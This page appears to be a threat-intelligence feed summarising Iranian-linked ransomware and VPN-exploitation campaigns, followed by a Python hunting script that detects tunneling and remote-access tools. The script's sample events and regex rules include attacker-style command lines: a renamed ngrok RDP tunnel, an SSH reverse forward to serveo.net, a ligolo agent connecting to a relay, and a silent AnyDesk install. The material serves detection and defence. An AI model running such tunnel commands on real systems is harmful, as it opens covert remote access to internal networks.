Latest Update: 15/01/2026

Threats Feed

  1. Public

    Fox Kitten-Linked Ransomware Operation Hits $4M in Geopolitical Cyber Campaign

    Since February 2025, the Iranian-aligned Pay2Key.I2P ransomware-as-a-service (RaaS) operation—linked to Fox Kitten APT and Mimic ransomware—has launched ideologically driven attacks against Western targets. With a strong presence on Russian and Chinese darknet forums, the group markets an advanced ransomware builder with capabilities for both Windows and Linux. The payloads use advanced evasion techniques, including dual CMD/PowerShell scripts, Themida packing, and AV bypass tools like “NoDefender.” Over $4 million in ransom payments and 51 successful attacks were recorded in four months. Targets are not specified by country or sector, but the campaign’s rhetoric and infrastructure indicate a focus on geopolitical adversaries of Iran.

  2. Public

    Iran-Based Hackers Target U.S. Sectors, Collaborate with Ransomware Affiliates

    Iran-based cyber actors linked to the Iranian government are exploiting organisations across multiple sectors in the US, including education, finance, healthcare, defence, and local government, as well as targets in Israel, Azerbaijan, and the UAE. Since 2017, these actors have focused on gaining and monetising network access, working with ransomware affiliates such as NoEscape, RansomHouse, and ALPHV (BlackCat). They exploit vulnerabilities in internet-facing services such as Check Point, Palo Alto Networks and Citrix appliances. They also use tools such as AnyDesk, PowerShell, Ligolo and Ngrok for persistence and command-and-control.

  3. Public

    PIONEER KITTEN: Exploiting VPN Vulnerabilities to Target Sensitive Sectors

    Pioneer Kitten, an Iran-based adversary active since 2017, targets North American and Israeli entities of intelligence interest, including technology, government, defense, and healthcare sectors. The group relies on exploiting vulnerabilities in VPNs and network appliances (e.g., CVE-2019-11510, CVE-2019-19781, CVE-2020-5902) for initial access, and uses open-source tools like Ngrok and SSHMinion for SSH tunneling and RDP for hands-on activity. Recently, PIONEER KITTEN was seen selling access to compromised networks on underground forums, indicating an attempt to diversify revenue streams.

  4. Public

    Fox Kitten Campaign: Iranian APTs Target Global Infrastructure via VPN Exploits

    Iranian APT groups APT34 and APT33 jointly operated the Fox Kitten campaign from 2017 to 2019, exploiting VPN vulnerabilities (e.g., Pulse Secure CVE-2019-11510, Fortinet CVE-2018-13379) to breach networks across Israel, the US, Gulf states, and Europe. Targeted sectors included IT, telecommunications, oil and gas, aviation, government, and security. The attackers established persistence using custom and open-source tools, including SSH tunnels, RDP proxies, webshells, and credential dumping via Mimikatz and ProcDump. Tools like Ngrok and Serveo enabled data exfiltration. The infrastructure supported both espionage and potential destructive operations tied to malware such as ZeroCleare and Dustman.

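    Items 2, 3 and 4 above all name the same class of tradecraft: off-the-shelf tunneling and remote-access tools (Ngrok, Ligolo, Serveo-style SSH reverse tunnels, AnyDesk) used for persistence and command-and-control after an edge-device compromise. The hunt below is an added example, not code from this feed or from any of the reports it summarises; the event field names, the sample process-creation events and the regular expressions are all constructed here as assumptions. The rules key on argument shape rather than only on the executable name, because renamed binaries (an ngrok dropped as "svchost.exe" in a user's Temp folder) are a routine evasion.

```python
"""Hunt process-creation events for tunneling / remote-access tooling.

Added example. Field names follow a Sysmon-like shape (host, user, image,
cmdline, parent) chosen for illustration; the regexes are hunting
heuristics, not signatures published by any vendor.
"""
import re
from typing import Dict, List, Tuple

# rule name -> (compiled regex, short rationale). Each regex is run over
# "<image> <cmdline>" so both the binary path and its arguments are visible.
RULES: Dict[str, Tuple[re.Pattern, str]] = {
    # ngrok binary, or a renamed binary invoked with ngrok's argument shape:
    # "<bin> tcp 3389 --authtoken <token>"
    "ngrok_tunnel": (
        re.compile(r"\bngrok\b|\b(?:tcp|http|tls)\s+\d{2,5}\b.*--authtoken", re.I),
        "ngrok-style tunnel (binary name or tcp/http <port> --authtoken args)",
    ),
    # ssh with a remote port-forward (-R) such as "ssh -R 3389:127.0.0.1:3389 serveo.net".
    # Case-sensitive on purpose: -R is the reverse-forward flag, -r is not an ssh option.
    "ssh_reverse_tunnel": (
        re.compile(r"\bssh(?:\.exe)?\b.*\s-R\s*\d*:?[\w.]*:\d+"),
        "ssh reverse tunnel (-R) exposing a local service to a remote host",
    ),
    # ligolo / ligolo-ng agent dialing back to its proxy: "agent -connect host:port"
    "ligolo_agent": (
        re.compile(r"\bligolo\b|\bagent(?:\.exe)?\b.*-connect\s+\S+:\d+", re.I),
        "ligolo agent connecting to a relay",
    ),
    # AnyDesk unattended install / autostart flags
    "anydesk_install": (
        re.compile(r"\banydesk\b.*(?:--install|--silent|--start-with-win)", re.I),
        "AnyDesk silent or persistent install",
    ),
}

# Constructed sample events (assumption: not real telemetry). Four are
# malicious lookalikes of the TTPs in the feed, two are benign controls.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"host": "WS-042", "user": "CORP\\jdoe", "parent": "cmd.exe",
     "image": "C:\\Users\\jdoe\\AppData\\Local\\Temp\\svchost.exe",
     "cmdline": "svchost.exe tcp 3389 --authtoken 2AbCdEf_constructed"},
    {"host": "SRV-DB01", "user": "CORP\\svc_backup", "parent": "powershell.exe",
     "image": "C:\\Windows\\System32\\OpenSSH\\ssh.exe",
     "cmdline": "ssh -R 3389:127.0.0.1:3389 serveo.net"},
    {"host": "WS-017", "user": "CORP\\asmith", "parent": "explorer.exe",
     "image": "C:\\ProgramData\\agent.exe",
     "cmdline": "agent.exe -connect 203.0.113.5:11601 -ignore-cert"},
    {"host": "WS-017", "user": "CORP\\asmith", "parent": "cmd.exe",
     "image": "C:\\Users\\asmith\\Downloads\\AnyDesk.exe",
     "cmdline": "AnyDesk.exe --install C:\\ProgramData\\AnyDesk --start-with-win --silent"},
    {"host": "WS-042", "user": "NT AUTHORITY\\SYSTEM", "parent": "services.exe",
     "image": "C:\\Windows\\System32\\svchost.exe",
     "cmdline": "svchost.exe -k netsvcs"},
    {"host": "SRV-DB01", "user": "CORP\\dba", "parent": "cmd.exe",
     "image": "C:\\Windows\\System32\\OpenSSH\\ssh.exe",
     "cmdline": "ssh.exe -p 22 dba@jump.corp.local"},
]


def scan_events(events: List[Dict[str, str]]) -> List[Dict[str, str]]:
    """Return one finding per (event, rule) match."""
    findings: List[Dict[str, str]] = []
    for ev in events:
        haystack = f"{ev.get('image', '')} {ev.get('cmdline', '')}"
        for name, (rx, why) in RULES.items():
            if rx.search(haystack):
                findings.append({"host": ev["host"], "user": ev["user"],
                                 "parent": ev.get("parent", ""), "rule": name,
                                 "why": why, "cmdline": ev["cmdline"]})
    return findings


def hosts_by_rule(findings: List[Dict[str, str]]) -> Dict[str, List[str]]:
    """Pivot findings to rule -> sorted unique hosts, for triage."""
    out: Dict[str, set] = {}
    for f in findings:
        out.setdefault(f["rule"], set()).add(f["host"])
    return {rule: sorted(hosts) for rule, hosts in out.items()}


if __name__ == "__main__":
    for f in scan_events(SAMPLE_EVENTS):
        print(f"{f['host']:8} {f['user']:22} {f['rule']:20} {f['cmdline']}")
```

    The benign controls matter as much as the hits: a service-hosted svchost.exe and an interactive `ssh -p 22` must not fire, otherwise the rule set is unusable at scale. When turning this into a SIEM query, pair the `ngrok_tunnel` and `ligolo_agent` hits with the parent process and image path (an "agent.exe" under ProgramData launched from explorer.exe is worth a look on its own), and treat any `-R` forward from a server as a reason to pull the host's outbound connections.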